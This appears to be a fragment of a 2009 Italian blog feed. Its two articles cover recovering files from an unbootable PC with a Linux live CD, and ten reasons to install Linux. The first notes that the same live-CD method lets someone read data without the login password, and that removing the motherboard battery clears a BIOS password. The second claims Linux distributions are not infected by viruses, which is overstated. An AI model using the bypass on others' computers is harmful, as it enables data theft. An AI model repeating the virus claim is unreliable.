src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Technorati" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Google Bookmarks" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Segnalo" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'GNU/Linux Quale Scegliere?' a OKnotizie" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=GNU%2FLinux+Quale+Scegliere%3F&amp;url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Diggita" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;t=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a FaceBook" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/&amp;title=GNU%2FLinux+Quale+Scegliere%3F" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Upnews" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=GNU%2FLinux+Quale+Scegliere%3F&amp;url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a NotizieFlash" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Twitter" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=GNU%2FLinux+Quale+Scegliere%3F&amp;url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a Technotizie" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=GNU%2FLinux+Quale+Scegliere%3F&amp;url=http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/" title="Aggiungi 'GNU/Linux Quale Scegliere?' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'GNU/Linux Quale Scegliere?' a FriendFeed" alt="Aggiungi 'GNU/Linux Quale Scegliere?' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/12/21/gnulinux-quale-scegliere/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Craccare un Sistema con una Distribuzione Live di Linux</title>
		<link>http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/</link>
		<comments>http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/#comments</comments>
		<pubDate>Fri, 18 Dec 2009 04:05:41 +0000</pubDate>
		<dc:creator>Daniele Chiuri</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=917</guid>
		<description><![CDATA[Sarà successo sicuramente a tutti di accendere il computer e di trovarsi faccia a faccia con una brutta verità: il pc non parte. Le schermate che possiamo avere davanti agli occhi possono essere diverse: blu, nere, loghi di windows che durano ventiquattro ore ecc. Oggi scopriremo come riuscire a recuperare i nostri dati anche se [...]]]></description>
			<content:encoded><![CDATA[<p>Sarà successo sicuramente a tutti di accendere il computer e di trovarsi faccia a faccia con una brutta verità: il pc non parte. Le schermate che possiamo avere davanti agli occhi possono essere diverse: blu, nere, loghi di windows che durano ventiquattro ore ecc. Oggi scopriremo come riuscire a recuperare i nostri dati anche se il computer non parte.</p>
<p>Teniamo conto del fatto che questo sistema potrebbe essere usato anche da un malintenzionato che vuole rubarci i dati quindi prendiamo le nostre precauzioni.</p>
<p>Per risolvere il problema sopra citato dobbiamo possedere una distribuzione live di linux. Sul web se ne trovano molte da scaricare gratuitamente citiamo giusto le più famose come Ubuntu, SuSE e Gentoo.</p>
<p>Prima di parlare del metodo in se stesso facciamo una breve digressione sul significato della parola LIVE. Come molti di noi sapranno i sistemi operativi linux sono gratuiti e scaricabili liberamente. Quasi tutte le aziende che producono questi sistemi operativi creano anche delle versioni che partono direttamente da cd che vengono chiamate appunto live. Questi sistemi operativi non copiano nessun dato sul nostro hard disk ma partono semplicemente inserendo il disco all&#8217;interno dello slot al momento dell&#8217;avvio. Una volta che il sistema è partito basta riavviare (togliendo ovviamente il cd dall&#8217;alloggiamento) per ritornare senza danni al nostro sistema originale.</p>
<p>Detto questo passiamo al metodo in se stesso. Inseriamo il cd della live che abbiamo scelto (se siamo neofiti consiglio Ubuntu, Kubuntu o SuSE). Dopo qualche minuto di caricamento apparirà il desktop di linux (che non differisce di molto da quello di windows) ora basterà andare a cercare il pannello &#8220;<em>Risorse del computer</em>&#8221; che per esempio nel caso di SuSE si chiama <em>Dauphin</em> e da lì andiamo a cercare il nostro hard disk. Una volta trovato (non vi preoccupate è più facile a farsi che a dirsi) possiamo masterizzare tutto su un dvd oppure usare un supporto esterno per salvare i nostri file.</p>
<p>Con questo metodo riusciamo a recuperare tutti i nostri dati anche se Windows è irreparabilmente corrotto.</p>
<p>Come detto sopra questo metodo potrebbe essere usato per rubare dati da un computer del quale non possediamo la password di accesso.<br />
Come possiamo proteggerci? Un modo potrebbe essere quello di impostare una password direttamente dal bios al posto della solita password di windows. In questo andremo a proteggere tutto il computer e non solo l&#8217;account del nostro sistema operativo e renderemo questo metodo, e anche quello descritto qualche giorno fa basato sull&#8217;<a href="http://www.pillolhacking.net/2009/12/09/crackare-windows-quando-gli-utenti-facilitano-la-vita-agli-hackers/">account Administrator</a>, inefficace. Ovviamente questo non è un metodo sicuro al 100% in quanto avendo un accesso fisico al pc si può annullare la password del bios resettando lo stesso (in pratica togliendo e rimettendo la batteria della scheda madre). Quindi in conclusione è meglio se facciamo molta attenzione a chi si avvicina al nostro computer.</p>
<p><em>Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore del libro <a href="http://www.pillolhacking.net/2009/04/07/libro-fantasmi-della-rete/">Fantasmi della rete</a></em></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Del.icio.us" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a digg" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technorati" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Google Bookmarks" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Segnalo" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a OKnotizie" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux&amp;url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Diggita" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;t=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FaceBook" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Upnews" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux&amp;url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a NotizieFlash" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a NotizieFlash" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home?status=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Twitter"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/twitter.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Twitter" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Twitter" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technotizie.it/posta_ok?action=f2&amp;title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux&amp;url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technotizie.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technotizie" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a Technotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://friendfeed.com/share/bookmarklet/frame#title=Craccare+un+Sistema+con+una+Distribuzione+Live+di+Linux&amp;url=http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FriendFeed"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/friendfeed.png" title="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FriendFeed" alt="Aggiungi 'Craccare un Sistema con una Distribuzione Live di Linux' a FriendFeed" /></a></div>
<!-- Social Bookmarking Reloaded END -->]]></content:encoded>
			<wfw:commentRss>http://www.pillolhacking.net/2009/12/18/craccare-un-sistema-con-una-distribuzione-live-di-linux/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>10 Buoni Motivi per Installare Linux</title>
		<link>http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/</link>
		<comments>http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/#comments</comments>
		<pubDate>Wed, 16 Dec 2009 04:24:07 +0000</pubDate>
		<dc:creator>Daniele Chiuri</dc:creator>
				<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.pillolhacking.net/?p=923</guid>
		<description><![CDATA[Ogni volta che dobbiamo prendere una decisione dobbiamo avere a monte dei buoni motivi per poter essere convinti di quello che facciamo. Questo vale per tutti i campi della vita, compresa la scelta del sistema operativo. Cosa usare? Windows o linux? Cos&#8217;è meglio? Ci sono molti pareri contrastanti riguardo a queste domande e qui non [...]]]></description>
			<content:encoded><![CDATA[<p>Ogni volta che dobbiamo prendere una decisione dobbiamo avere a monte dei buoni motivi per poter essere convinti di quello che facciamo. Questo vale per tutti i campi della vita, compresa la scelta del sistema operativo. Cosa usare? Windows o linux? Cos&#8217;è meglio?</p>
<p>Ci sono molti pareri contrastanti riguardo a queste domande e qui non si vogliono dare giudizi nè su uno nè sull&#8217;altro, voglio solo dirvi quali sono i pundi di forza del pinguino visti dal punto di vista di un hacker.</p>
<p>1 &#8211; <strong>Sicurezza.</strong> Tutte le distribuzioni non vengono infettate da virus. Questo perchè ce ne sono pochissimi compatibili in circolazione.</p>
<p>2 &#8211; <strong>Flessibilità.</strong> In base alle nostre esigenze possiamo decidere di avere un sistema operativo basato su una shell di comando e basta oppure tutti i fronzoli di un motore grafico che non ha nulla da invidiare all&#8217;ultimissimo windows 7.</p>
<p>3 &#8211; <strong>Strumenti.</strong> Per la vita di un hacker sono indispensabili programmi come <a href="http://www.pillolhacking.net/2008/09/26/le-sette-vite-di-netcat/">netcat</a> e <a href="http://www.pillolhacking.net/2009/07/17/nmap-5-0-la-spettacolare-evoluzione-di-un-network-scanner/">nmap</a> che su linux sono già disponibili e pronti per l&#8217;uso.</p>
<p>4 &#8211; <strong>Prezzo.</strong> Come sappiamo tutte (o quasi) le distribuzioni di linux sono gratuite: a partire dall&#8217;essenziale ma potente debian fino ad arrivare alla grafica di kubuntu.</p>
<p>5 &#8211; <strong>Etica.</strong> Il comportamento delle multinazionali non ci è mai stato simpatico e mamma Microsoft fa parte di queste. Monopolio è un aggettivo che si associa spesso alla casa di zio Bill.</p>
<p>6 &#8211; <strong>Personalizzazione.</strong> Come sappiamo la licenza GNU/GPL ci permette di modificare a nostro uso e consumo il sistema operativo per creare, per chi ne ha le capacità, un programma ad hoc.</p>
<p>7 &#8211; <strong>Semplicità.</strong> Linux difficile? Retaggio del passato. Chiunque usi windows può passare senza problemi a distribuzioni semplici come kubuntu, SuSE, mandriva ecc. Dopo poco tempo di utilizzo si potrà passare a qualcosa di più complesso.</p>
<p>8 &#8211; <strong>Software.</strong> Chi dice che non ci sono programmi per linux si sbaglia. Quasi tutti i software per windows hanno una loro versione per linux e quelli che non ce l&#8217;hanno&#8230;si possono sempre far partire con qualche emulatore.</p>
<p>9 &#8211; <strong>Compatibilità.</strong> Avete un computer un po&#8217; datato? Non importa troverete la soluzione con un sistema operativo moderno ma adatto alle vostre prestazioni. Senza dover usare programmi creati dieci anni fa.</p>
<p>10 &#8211; Devo dirvi anche un decimo motivo?</p>
<p><em>Questo articolo è stato scritto da Daniele Chiuri alias ilchiuri autore del libro <a href="http://www.pillolhacking.net/2009/04/07/libro-fantasmi-della-rete/">Fantasmi della rete</a></em></p>
<!-- Social Bookmarking Reloaded BEGIN --><div class="social_bookmark"><em>Segnala presso:</em><br /><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Del.icio.us"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/delicious.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Del.icio.us" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Del.icio.us" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a digg"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/digg.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a digg" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a digg" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.technorati.com/faves?add=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Technorati"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/technorati.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Technorati" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Technorati" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Google Bookmarks"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/google.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Google Bookmarks" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Google Bookmarks" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://segnalo.alice.it/post.html.php?url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Segnalo"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/segnalo.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Segnalo" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Segnalo" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://oknotizie.alice.it/post?url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a OKnotizie"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/oknotizie.gif" title="Aggiungi '10 Buoni Motivi per Installare Linux' a OKnotizie" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a OKnotizie" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.diggita.it/submit.php?title=10+Buoni+Motivi+per+Installare+Linux&amp;url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Diggita"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/diggita.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Diggita" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Diggita" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/share.php?u=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;t=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a FaceBook"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/facebook.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a FaceBook" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a FaceBook" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.upnews.it/submit?url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/&amp;title=10+Buoni+Motivi+per+Installare+Linux" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Upnews"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/upnews.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a Upnews" alt="Aggiungi '10 Buoni Motivi per Installare Linux' a Upnews" /></a><a class="social_img" onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,border=0,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://notizieflash.com/submit.php?title=10+Buoni+Motivi+per+Installare+Linux&amp;url=http://www.pillolhacking.net/2009/12/16/10-buoni-motivi-per-installare-linux/" title="Aggiungi '10 Buoni Motivi per Installare Linux' a NotizieFlash"><img src="http://www.pillolhacking.net/wp-content/plugins/social-bookmarking-reloaded/notizieflash.png" title="Aggiungi '10 Buoni Motivi per Installare Linux' a 